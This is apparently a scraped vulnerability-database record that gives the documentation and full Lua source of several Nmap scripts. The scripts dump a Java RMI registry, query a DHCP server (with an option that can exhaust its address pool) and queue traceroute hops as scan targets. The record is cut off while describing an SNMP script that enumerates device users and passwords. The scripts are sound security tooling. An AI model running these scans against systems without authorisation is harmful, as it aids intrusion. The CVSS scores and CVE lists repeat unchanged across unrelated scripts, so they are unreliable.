file:/C:/CFusionMX7/runtime/../lib/smack.jar\n | file:/C:/CFusionMX7/runtime/../lib/smpp.jar\n | file:/C:/CFusionMX7/runtime/../lib/STComm.jar\n | file:/C:/CFusionMX7/runtime/../lib/tools.jar\n | file:/C:/CFusionMX7/runtime/../lib/tt-bytecode.jar\n | file:/C:/CFusionMX7/runtime/../lib/vadmin.jar\n | file:/C:/CFusionMX7/runtime/../lib/verity.jar\n | file:/C:/CFusionMX7/runtime/../lib/vparametric.jar\n | file:/C:/CFusionMX7/runtime/../lib/vsearch.jar\n | file:/C:/CFusionMX7/runtime/../lib/wc50.jar\n | file:/C:/CFusionMX7/runtime/../lib/webchartsJava2D.jar\n | file:/C:/CFusionMX7/runtime/../lib/wsdl2java.jar\n | file:/C:/CFusionMX7/runtime/../lib/wsdl4j-1.5.1.jar\n | file:/C:/CFusionMX7/runtime/../lib/wsdl4j.jar\n | file:/C:/CFusionMX7/runtime/../lib/xalan.jar\n | file:/C:/CFusionMX7/runtime/../lib/xercesImpl.jar\n | file:/C:/CFusionMX7/runtime/../lib/xml-apis.jar\n | file:/C:/CFusionMX7/runtime/../lib/\n | file:/C:/CFusionMX7/runtime/../gateway/lib/examples.jar\n | file:/C:/CFusionMX7/runtime/../gateway/lib/\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-awt-util.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-css.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-ext.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-transcoder.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-util.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/commons-discovery.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/commons-logging.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/concurrent.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/flex.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jakarta-oro-2.0.7.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jcert.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jnet.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jsse.jar\n | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/oscache.jar\n |_ file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/\n \n \n\n## Requires \n\n * [rmi](<../lib/rmi.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-11-01T20:47:48", "type": "nmap", "title": "rmi-dumpregistry NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-03-28T14:16:05", "id": "NMAP:RMI-DUMPREGISTRY.NSE", "href": "https://nmap.org/nsedoc/scripts/rmi-dumpregistry.html", "sourceData": "local rmi = require \"rmi\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a remote RMI registry and attempts to dump all of its\nobjects.\n\nFirst it tries to determine the names of all objects bound in the\nregistry, and then it tries to determine information about the\nobjects, such as the the class names of the superclasses and\ninterfaces. This may, depending on what the registry is used for, give\nvaluable information about the service. E.g, if the app uses JMX (Java\nManagement eXtensions), you should see an object called \"jmxconnector\"\non it.\n\nIt also gives information about where the objects are located, (marked\nwith @<ip>:port in the output).\n\nSome apps give away the classpath, which this scripts catches in\nso-called \"Custom data\".\n]]\n\n---\n-- @usage nmap --script rmi-dumpregistry -p 1098 <host>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 1099/tcp open rmiregistry syn-ack\n-- | rmi-dumpregistry:\n-- | jmxrmi\n-- | javax.management.remote.rmi.RMIServerImpl_Stub\n-- | @127.0.1.1:40353\n-- | extends\n-- | java.rmi.server.RemoteStub\n-- | extends\n-- |_ java.rmi.server.RemoteObject\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 1099/tcp open rmiregistry syn-ack\n-- | rmi-dumpregistry:\n-- | cfassembler/default\n-- | coldfusion.flex.rmi.DataServicesCFProxyServer_Stub\n-- | @192.168.0.3:1271\n-- | extends\n-- | java.rmi.server.RemoteStub\n-- | extends\n-- | java.rmi.server.RemoteObject\n-- | Custom data\n-- | Classpath\n-- | file:/C:/CFusionMX7/runtime/../lib/ant-launcher.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ant.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/axis.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/backport-util-concurrent.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/bcel.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cdo.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cdohost.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cf4was.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cf4was_ae.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cfmx-ssl.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/cfusion.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-beanutils-1.5.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-collections-2.1.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-digester-1.3.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-digester-1.7.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-discovery-0.2.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-discovery.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-logging-1.0.2.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-logging-api-1.0.2.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/commons-net-1.2.2.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/crystal.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flashgateway.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flashremoting_update.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flex-assemblerservice.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-common.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-opt.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flex-messaging-req.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/flex-messaging.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/httpclient.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ib61patch.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ib6addonpatch.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ib6core.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ib6swing.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ib6util.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/im.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/iText.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/iTextAsian.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/izmado.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/jakarta-oro-2.0.6.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/java2wsdl.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/jaxrpc.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/jdom.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/jeb.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/jintegra.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ldap.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ldapbp.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/log4j.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/macromedia_drivers.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/mail.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/msapps.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/pbclient42RE.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/pbembedded42RE.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/pbserver42RE.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/pbtools42RE.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/poi-2.5.1-final-20040804.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/poi-contrib-2.5.1-final-20040804.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/ri_generic.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/saaj.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/smack.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/smpp.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/STComm.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/tools.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/tt-bytecode.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/vadmin.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/verity.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/vparametric.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/vsearch.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/wc50.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/webchartsJava2D.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/wsdl2java.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/wsdl4j-1.5.1.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/wsdl4j.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/xalan.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/xercesImpl.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/xml-apis.jar\n-- | file:/C:/CFusionMX7/runtime/../lib/\n-- | file:/C:/CFusionMX7/runtime/../gateway/lib/examples.jar\n-- | file:/C:/CFusionMX7/runtime/../gateway/lib/\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-awt-util.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-css.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-ext.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-transcoder.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/batik-util.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/commons-discovery.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/commons-logging.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/concurrent.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/flex.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jakarta-oro-2.0.7.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jcert.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jnet.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/jsse.jar\n-- | file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/oscache.jar\n-- |_ file:/C:/CFusionMX7/runtime/../wwwroot/WEB-INF/cfform/jars/\n--\n--\n--@version 0.5\n\nauthor = \"Martin Holst Swende\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = shortport.port_or_service({1098, 1099, 1090, 8901, 8902, 8903}, {\"java-rmi\", \"rmiregistry\"})\n\n-- Some lazy shortcuts\n\nlocal function dbg(str,...)\n stdnse.debug3(\"RMI-DUMPREG:\"..str, ...)\nend\n\nlocal function dbg_err(str, ... )\n stdnse.debug1(\"RMI-DUMPREG-ERR:\"..str, ...)\nend\n\n-- Function to split a string\nlocal function split(str, sep)\n local sep, fields = sep or \"; \", {}\n local pattern = string.format(\"([^%s]+)\", sep)\n str:gsub(pattern, function(c) fields[#fields+1] = c end)\n return fields\nend\n\n---This is a customData formatter. In some cases, the RMI library finds \"custom\n-- data\" that belongs to an object. This data is not handled correctly; it is\n-- instead dumped into the object's customData field (which is a table with\n-- strings).\n-- The RMI library does not do anything more than that. However, here, in the\n-- land of rmi-dumpregistry, we may have more knowledge about how to interpret\n-- that data. For example, coldfusion.flex.rmi.DataServicesCFProxyServer_Stub\n-- discloses the classpath in this variable.\n-- This method looks at the contents of the custom data and if it looks like\n-- a class path, we display it as such. This method is passed to the toTable()\n-- method of the returned RMI object.\n-- @return title, data\nfunction customDataFormatter(className, customData)\n if customData == nil then return nil end\n if #customData == 0 then return nil end\n\n local retData = {}\n for k,v in ipairs(customData) do\n if v:find(\"file:/\") == 1 then\n -- This is a classpath\n local cp = split(v, \"; \") -- Splits into table\n table.insert(retData, \"Classpath\")\n table.insert(retData, cp)\n else\n table.insert(retData[v])\n end\n end\n\n return \"Custom data\", retData\nend\n\n\nfunction action(host,port, args)\n local registry = rmi.Registry:new( host, port )\n\n local status, j_array = registry:list()\n local output = {}\n if not status then\n table.insert(output, (\"Registry listing failed (%s)\"):format(tostring(j_array)))\n return stdnse.format_output(false, output)\n end\n\n -- Monkey patch the java-class in rmi, to set our own custom data formatter\n -- for classpaths\n rmi.JavaClass.customDataFormatter = customDataFormatter\n\n -- We expect an array of strings to be the return data\n local data = j_array:getValues()\n for i,name in ipairs( data ) do\n --print(data)\n table.insert(output, name)\n dbg(\"Querying object %s\", name)\n local status, j_object = registry:lookup(name)\n\n if status then\n table.insert(output, j_object:toTable())\n end\n end\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:09", "description": "Sends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters without allocating a new address. \n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP address. The request sends a list of which fields it wants to know (a handful by default, every field if verbosity is turned on), and the server responds with the fields that were requested. It should be noted that the server doesn't have to return every field, nor does it have to return them in the same order, or honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested fields and returns a few standard ones. This script displays every field it receives. \n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results. Additionally, the MAC address can be randomized, which in should override the cache on the DHCP server and assign a new IP address. Extra requests can also be sent to exhaust the IP address range more quickly. \n\nSome of the more useful fields: \n\n * DHCP Server (the address of the server that responded) \n * Subnet Mask \n * Router \n * DNS Servers \n * Hostname\n\n### See also:\n\n * [ broadcast-dhcp6-discover.nse ](<../scripts/broadcast-dhcp6-discover.html>)\n * [ broadcast-dhcp-discover.nse ](<../scripts/broadcast-dhcp-discover.html>)\n\n## Script Arguments \n\n#### dhcp-discover.dhcptype \n\nThe type of DHCP request to make. By default, DHCPINFORM is sent, but this argument can change it to DHCPOFFER, DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or DHCPINFORM. Not all types will evoke a response from all servers, and many require different fields to contain specific values.\n\n#### dhcp-discover.mac \n\nSet to `native` (default) or `random` or a specific client MAC address in the DHCP request. Keep in mind that you may not see the response if a non-native address is used. Setting it to `random` will possibly cause the DHCP server to reserve a new IP address each time.\n\n#### dhcp-discover.requests \n\nSet to an integer to make up to that many requests (and display the results).\n\n## Example Usage \n \n \n nmap -sU -p 67 --script=dhcp-discover <target>\n\n## Script Output \n \n \n Interesting ports on 192.168.1.1:\n PORT STATE SERVICE\n 67/udp open dhcps\n | dhcp-discover:\n | DHCP Message Type: DHCPACK\n | Server Identifier: 192.168.1.1\n | IP Address Lease Time: 1 day, 0:00:00\n | Subnet Mask: 255.255.255.0\n | Router: 192.168.1.1\n |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n \n\n## Requires \n\n * [dhcp](<../lib/dhcp.html>)\n * [rand](<../lib/rand.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-09-10T03:26:53", "type": "nmap", "title": "dhcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-01-19T16:37:36", "id": "NMAP:DHCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/dhcp-discover.html", "sourceData": "local dhcp = require \"dhcp\"\nlocal rand = require \"rand\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nSends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters\nwithout allocating a new address.\n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP\naddress. The request sends a list of which fields it wants to know (a handful by default, every field if\nverbosity is turned on), and the server responds with the fields that were requested. It should be noted\nthat the server doesn't have to return every field, nor does it have to return them in the same order,\nor honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested\nfields and returns a few standard ones. This script displays every field it receives.\n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results.\nAdditionally, the MAC address can be randomized, which in should override the cache on the DHCP server and\nassign a new IP address. Extra requests can also be sent to exhaust the IP address range more quickly.\n\nSome of the more useful fields:\n* DHCP Server (the address of the server that responded)\n* Subnet Mask\n* Router\n* DNS Servers\n* Hostname\n]]\n\n---\n-- @see broadcast-dhcp6-discover.nse\n-- @see broadcast-dhcp-discover.nse\n--\n-- @args dhcp-discover.dhcptype The type of DHCP request to make. By default,\n-- DHCPINFORM is sent, but this argument can change it to DHCPOFFER,\n-- DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or\n-- DHCPINFORM. Not all types will evoke a response from all servers,\n-- and many require different fields to contain specific values.\n-- @args dhcp-discover.mac Set to <code>native</code> (default) or\n-- <code>random</code> or a specific client MAC address in the DHCP\n-- request. Keep in mind that you may not see the response if\n-- a non-native address is used. Setting it to <code>random</code> will\n-- possibly cause the DHCP server to reserve a new IP address each time.\n-- @args dhcp-discover.requests Set to an integer to make up to that many\n-- requests (and display the results).\n--\n-- @usage\n-- nmap -sU -p 67 --script=dhcp-discover <target>\n-- @output\n-- Interesting ports on 192.168.1.1:\n-- PORT STATE SERVICE\n-- 67/udp open dhcps\n-- | dhcp-discover:\n-- | DHCP Message Type: DHCPACK\n-- | Server Identifier: 192.168.1.1\n-- | IP Address Lease Time: 1 day, 0:00:00\n-- | Subnet Mask: 255.255.255.0\n-- | Router: 192.168.1.1\n-- |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n--\n-- @xmloutput\n-- <elem key=\"DHCP Message Type\">DHCPACK</elem>\n-- <elem key=\"Server Identifier\">192.168.1.1</elem>\n-- <elem key=\"IP Address Lease Time\">1 day, 0:00:00</elem>\n-- <elem key=\"Subnet Mask\">255.255.255.0</elem>\n-- <elem key=\"Router\">192.168.1.1</elem>\n-- <table key=\"Domain Name Server\">\n-- <elem>208.81.7.10</elem>\n-- <elem>208.81.7.14</elem>\n-- </table>\n--\n\n--\n-- 2020-01-14 - Revised by nnposter\n-- o Added script argument \"mac\" to prescribe a specific MAC address\n-- o Deprecated argument \"randomize_mac\" in favor of \"mac=random\"\n--\n-- 2011-12-28 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Removed DoS code and placed script into discovery and safe categories\n--\n-- 2011-12-27 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Changed script to use DHCPINFORM instead of DHCPDISCOVER\n--\n\n\nauthor = \"Ron Bowes\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\"}\n\n\n-- We want to run against a specific host if UDP/67 is open\nfunction portrule(host, port)\n if nmap.address_family() ~= 'inet' then\n stdnse.debug1(\"is IPv4 compatible only.\")\n return false\n end\n\n return shortport.portnumber(67, \"udp\")(host, port)\nend\n\naction = function(host, port)\n local dhcptype = (stdnse.get_script_args(SCRIPT_NAME .. \".dhcptype\") or \"DHCPINFORM\"):upper()\n local dhcptypeid = dhcp.request_types[dhcptype]\n if not dhcptypeid then\n return stdnse.format_output(false, \"Invalid request type (use \"\n .. table.concat(dhcp.request_types_str, \" / \")\n .. \")\")\n end\n\n local reqcount = tonumber(stdnse.get_script_args(SCRIPT_NAME .. \".requests\") or 1)\n if not reqcount then\n return stdnse.format_output(false, \"Invalid request count\")\n end\n\n local iface, err = nmap.get_interface_info(host.interface)\n if not (iface and iface.address) then\n return stdnse.format_output(false, \"Couldn't determine local IP for interface: \" .. host.interface)\n end\n\n local overrides = {}\n\n local macaddr = (stdnse.get_script_args(SCRIPT_NAME .. \".mac\") or \"native\"):lower()\n -- Support for legacy argument \"randomize_mac\"\n local randomize = (stdnse.get_script_args(SCRIPT_NAME .. \".randomize_mac\") or \"false\"):lower()\n if randomize == \"true\" or randomize == \"1\" then\n stdnse.debug1(\"Use %s.mac=random instead of %s.randomize_mac=%s\", SCRIPT_NAME, SCRIPT_NAME, randomize)\n macaddr = \"random\"\n end\n if macaddr ~= \"native\" then\n -- Set the scanner as a relay agent\n overrides.giaddr = string.unpack(\"<I4\", ipOps.ip_to_str(iface.address))\n end\n local macaddr_iter\n if macaddr:find(\"^ra?nd\") then\n macaddr_iter = function () return rand.random_string(6) end\n else\n if macaddr == \"native\" then\n macaddr = host.mac_addr_src\n else\n macaddr = macaddr:gsub(\":\", \"\")\n if not (#macaddr == 12 and macaddr:find(\"^%x+$\")) then\n return stdnse.format_output(false, \"Invalid MAC address\")\n end\n macaddr = stdnse.fromhex(macaddr)\n end\n macaddr_iter = function () return macaddr end\n end\n\n local results = {}\n for i = 1, reqcount do\n local macaddr = macaddr_iter()\n stdnse.debug1(\"Client MAC address: %s\", stdnse.tohex(macaddr, {separator = \":\"}))\n local status, result = dhcp.make_request(host.ip, dhcptypeid, iface.address, macaddr, nil, nil, overrides)\n if not status then\n return stdnse.format_output(false, \"Couldn't send DHCP request: \" .. result)\n end\n table.insert(results, result)\n end\n\n if #results == 0 then\n return nil\n end\n\n nmap.set_port_state(host, port, \"open\")\n\n local response = stdnse.output_table()\n\n -- Display the results\n for i, result in ipairs(results) do\n local result_table = stdnse.output_table()\n\n if dhcptype ~= \"DHCPINFORM\" then\n result_table[\"IP Offered\"] = result.yiaddr_str\n end\n for _, v in ipairs(result.options) do\n if type(v.value) == 'table' then\n outlib.list_sep(v.value)\n end\n result_table[ v.name ] = v.value\n end\n\n if(#results == 1) then\n response = result_table\n else\n response[string.format(\"Response %d of %d\", i, #results)] = result_table\n end\n end\n\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:33:45", "description": "Inserts traceroute hops into the Nmap scanning queue. It only functions if Nmap's `--traceroute` option is used and the `newtargets` script argument is given.\n\n## Script Arguments \n\n#### newtargets \n\nIf specified, adds traceroute hops onto Nmap scanning queue.\n\n#### max-newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script targets-traceroute --script-args newtargets --traceroute target\n \n\n## Script Output \n \n \n Host script results:\n |_traceroute-scan-hops: successfully added 5 new targets.\n\n## Requires \n\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-09-10T01:53:22", "type": "nmap", "title": "targets-traceroute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:TARGETS-TRACEROUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/targets-traceroute.html", "sourceData": "local stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal target = require \"target\"\n\ndescription = [[\nInserts traceroute hops into the Nmap scanning queue. It only functions if\nNmap's <code>--traceroute</code> option is used and the <code>newtargets</code>\nscript argument is given.\n]]\n\n---\n-- @args newtargets If specified, adds traceroute hops onto Nmap\n-- scanning queue.\n--\n-- @usage\n-- nmap --script targets-traceroute --script-args newtargets --traceroute target\n--\n-- @output\n-- Host script results:\n-- |_traceroute-scan-hops: successfully added 5 new targets.\n\n\n-- 09/02/2010\nauthor = \"Henri Doreau\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"safe\", \"discovery\"}\n\n\nhostrule = function(host)\n -- print debug messages because the script relies on\n -- script arguments and traceroute results.\n if not target.ALLOW_NEW_TARGETS then\n stdnse.debug3(\"Skipping %s script, 'newtargets' script argument is missing.\", SCRIPT_NAME)\n return false\n end\n if not host.traceroute then\n stdnse.debug3(\"Skipping %s script because traceroute results are missing.\", SCRIPT_NAME)\n return false\n end\n return true\nend\n\naction = function(host)\n local ntargets = 0\n for _, hop in ipairs(host.traceroute) do\n -- avoid timedout hops, marked as empty entries\n -- do not add the current scanned host.ip\n if hop.ip and host.ip ~= hop.ip then\n local status, ret = target.add(hop.ip)\n if status then\n ntargets = ntargets + ret\n stdnse.debug3(\"TRACEROUTE Scan Hops: Added new target \"..host.ip..\" from traceroute results\")\n else\n stdnse.debug3(\"TRACEROUTE Scan Hops: \" .. ret)\n end\n end\n end\n\n if ntargets > 0 then\n return string.format(\"successfully added %d new targets.\\n\", ntargets)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:36", "description": "Attempts to enumerate Huawei / HP/H3C Locally Defined Users through the hh3c-user.mib OID \n\nFor devices running software released pre-Oct 2012 only an SNMP read-only string is required to access the OID. Otherwise a read-write string is required. \n\nOutput is 'username - password - level: {0|1|2|3}' \n\nPassword may be in cleartext, ciphertext or sha256 Levels are from 0 to 3 with 0 being the lowest security level \n\n<https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685> <http://grutztopia.jingojango.net/2012/10/hph3c-and-huawei-snmp-weak-access-to.html>\n\n## 